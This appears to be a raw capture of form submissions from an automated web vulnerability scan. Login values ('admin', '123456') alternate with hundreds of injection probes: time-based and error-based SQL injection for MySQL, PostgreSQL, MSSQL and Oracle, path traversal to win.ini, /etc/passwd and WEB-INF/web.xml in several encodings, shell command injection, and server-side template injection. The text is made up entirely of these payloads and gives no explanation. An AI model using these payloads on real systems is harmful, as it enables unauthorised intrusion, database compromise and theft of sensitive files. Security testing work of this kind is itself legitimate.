(select*from(select+sleep(2)union/**/select+1)a)

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin

123456

admin

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

admin

123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%

123456

admin

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

..\..\..\..\..\..\Windows\win.ini

123456

admin

123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="

.\..\..\..\..\..\..\Windows\win.ini

123456

admin

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

..\..\..\..\..\..\Windows\win.iniadmin

123456

admin

123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini

123456

admin

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

admin

123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0

../../../../../../../../../../../../../../../../../../Windows/win.ini

123456

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

./../../../../../../../../../../../../../../../../../../Windows/win.ini

123456

../../../../../../../../../../../../../../../../../../Windows/win.iniadmin

123456

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%

123456

admin

123456'and(select+1)>0waitfor/**/delay'0:0:0

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin

123456'and(select+1)>0waitfor/**/delay'0:0:2

../../../../../../Windows/win.ini

123456

admin

123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('r',0)

./../../../../../../Windows/win.ini

123456

admin

123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('d',2)

../../../../../../Windows/win.iniadmin

123456

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',0)='t

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini

123456

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',2)='q

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

WEB-INF/web.xml

123456

WEB-INF/web.xml;admin

123456

../WEB-INF/web.xml

123456

../WEB-INF/web.xml;admin

123456

../../WEB-INF/web.xml

123456

../../WEB-INF/web.xml;admin

123456

../../../WEB-INF/web.xml

123456

../../../WEB-INF/web.xml;admin

123456

../../../../WEB-INF/web.xml

123456

../../../../WEB-INF/web.xml;admin

123456

admin

123456

admin

123456 expr 833430721 + 811809445

admin

123456

admin

123456

/*1*/{{905275116+965720087}}

123456

admin

${@var_dump(md5(440672157))};

../../../../../../../../../../../../../../../../../../etc/passwd

123456

admin

${845345505+970699858}

admin

123456

${886073566+802418642}

123456

admin

123456|expr 880780741 + 888417010

admin

123456

admin

'-var_dump(md5(142434618))-'

${845065946+976463462}

123456

${(872715000+995376658)?c}

123456

../../../../../../../../../../../../../../../../../../etc/passwdadmin

123456

admin

123456

admin

123456$(expr 881688310 + 808247724)

admin

123456

${@var_dump(md5(386977074))};

123456

#set($c=953481390+921572764)${c}$c

123456

admin'and/**/extractvalue(1,concat(char(126),md5(1024673409)))and'

123456

./../../../../../../../../../../../../../../../../../../etc/passwd

123456

admin

123456

'-var_dump(md5(960398728))-'

123456

admin

123456&set /A 908442469+964666222

admin'and'r'='r

123456

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%

123456

<%- 851815762+976919804 %>

123456

admin

123456

admin"and/**/extractvalue(1,concat(char(126),md5(1909527390)))and"

123456

extractvalue(1,concat(char(126),md5(1673924167)))

123456

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin

123456

admin

123456

admin'and'd'='b

123456

admin

expr 833858734 + 927346789

admin

123456

../../../../../../etc/passwd

123456

admin"and"x"="x

123456

admin expr 831517820 + 839872796

123456

../../../../../../etc/passwdadmin

123456

admin

123456

admin"and"q"="k

123456

admin

123456

./../../../../../../etc/passwd

123456

admin|expr 863139843 + 883205439

123456

admin'and(select'1'from/**/cast(md5(1452397476)as/**/int))>'0

123456

admin

123456

admin

123456

admin$(expr 809099361 + 923259789)

123456

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

123456

admin/**/and/**/cast(md5('1000339659')as/**/int)>0

123456

admin

/*1*/{{936749190+957350625}}

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin&set /A 848116658+862539641

123456

admin

${839916068+897532230}

admin

123456

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1133487279')))

123456

/etc/passwd

123456

admin

123456

expr 820964021 + 857653604

123456

admin

${(930780155+887579752)?c}

admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1671181107')))>'0

123456

admin

123456

/etc/passwdadmin

123456

admin

#set($c=894732356+925114977)${c}$c

admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='

123456

admin

123456

%2fetc%2fpasswd

123456

admin

123456

admin鎈'"\(

123456

%u2215etc%u2215passwd

123456

admin

<%- 954694835+907538423 %>

admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='

123456

admin'"\(

123456

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

123456

admin

123456

admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="

123456

admin

123456

admin

123456

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

123456

admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="

123456

admin

123456

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.iniadmin

123456

admin

123456

admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0

123456

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%

123456

admin

123456

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

admin

123456

..\..\..\..\..\..\windows/win.ini

123456

admin

123456

admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0

123456

.\..\..\..\..\..\..\windows/win.ini

123456

admin

123456

..\..\..\..\..\..\windows/win.iniadmin

123456

admin'and(select+1)>0waitfor/**/delay'0:0:0

123456

admin

123456

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini

123456

admin'and(select+1)>0waitfor/**/delay'0:0:2

123456

admin

123456

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',0)='k

123456

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

admin

123456'and/**/extractvalue(1,concat(char(126),md5(1120218383)))and'

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',2)='k

123456

../../../../../../../../../../../../../../../../../../windows/win.ini

123456

admin

123456"and/**/extractvalue(1,concat(char(126),md5(1091284058)))and"

admin

123456

./../../../../../../../../../../../../../../../../../../windows/win.ini

123456

admin

extractvalue(1,concat(char(126),md5(1198162995)))

../../../../../../../../../../../../../../../../../../windows/win.iniadmin

123456

admin

123456

admin

123456'and(select'1'from/**/cast(md5(1555805162)as/**/int))>'0

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%

123456

admin

123456

admin

123456/**/and/**/cast(md5('1858557798')as/**/int)>0

admin

123456

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin

123456

admin

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1000293022')))

admin

123456

../../../../../../windows/win.ini

123456

admin

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1912241242')))>'0

./../../../../../../windows/win.ini

123456

admin

123456

../../../../../../windows/win.iniadmin

123456

admin

123456鎈'"\(

admin

123456

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini

123456

admin

123456'"\(

admin

123456

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

123456

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

123456

admin

123456

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.iniadmin

123456

admin

123456

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%

123456

admin

123456

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

admin

123456

..\..\..\..\..\..\windows/win.ini

123456

admin

123456

.\..\..\..\..\..\..\windows/win.ini

123456

..\..\..\..\..\..\windows/win.iniadmin

123456

admin

123456

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini

123456

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

admin

123456

../../../../../../../../../../../../../../../../../../windows/win.ini

123456

admin

123456

./../../../../../../../../../../../../../../../../../../windows/win.ini

123456

admin

123456

../../../../../../../../../../../../../../../../../../windows/win.iniadmin

123456

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%

123456

admin

123456

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin

123456

../../../../../../windows/win.ini

123456

./../../../../../../windows/win.ini

123456

admin

123456

../../../../../../windows/win.iniadmin

123456

admin

123456

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini

123456

admin

123456

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin

123456

admin

123456/**/and+3=3

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini

123456

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini

123456

admin

123456/**/and+0=8

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin

123456

admin

123456'and't'='t

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%

123456

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

admin

123456'and'y'='s

admin

123456"and"g"="g

..\..\..\..\..\..\Windows\win.ini

123456

admin

123456"and"t"="p

.\..\..\..\..\..\..\Windows\win.ini

123456

admin

(select*from(select+sleep(0)union/**/select+1)a)

..\..\..\..\..\..\Windows\win.iniadmin

123456

admin

(select*from(select+sleep(2)union/**/select+1)a)

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini

123456

admin

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

admin

123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='

../../../../../../../../../../../../../../../../../../Windows/win.ini

123456

admin

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

./../../../../../../../../../../../../../../../../../../Windows/win.ini

123456

../../../../../../../../../../../../../../../../../../Windows/win.iniadmin

123456

admin

123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%

123456

admin

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

../../../../../../Windows/win.ini

123456

admin

123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/

./../../../../../../Windows/win.ini

123456

admin

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

../../../../../../Windows/win.iniadmin

123456

admin

123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini

123456

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/

WEB-INF/web.xml

123456

WEB-INF/web.xml;admin

123456

../WEB-INF/web.xml

123456

admin

123456'and(select+1)>0waitfor/**/delay'0:0:0

../WEB-INF/web.xml;admin

123456

admin

123456'and(select+1)>0waitfor/**/delay'0:0:2

../../WEB-INF/web.xml

123456

admin

123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('o',0)

../../WEB-INF/web.xml;admin

123456

admin

123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('p',2)

../../../WEB-INF/web.xml

123456

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',0)='e

../../../WEB-INF/web.xml;admin

123456

../../../../WEB-INF/web.xml

123456

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',2)='q

../../../../WEB-INF/web.xml;admin

123456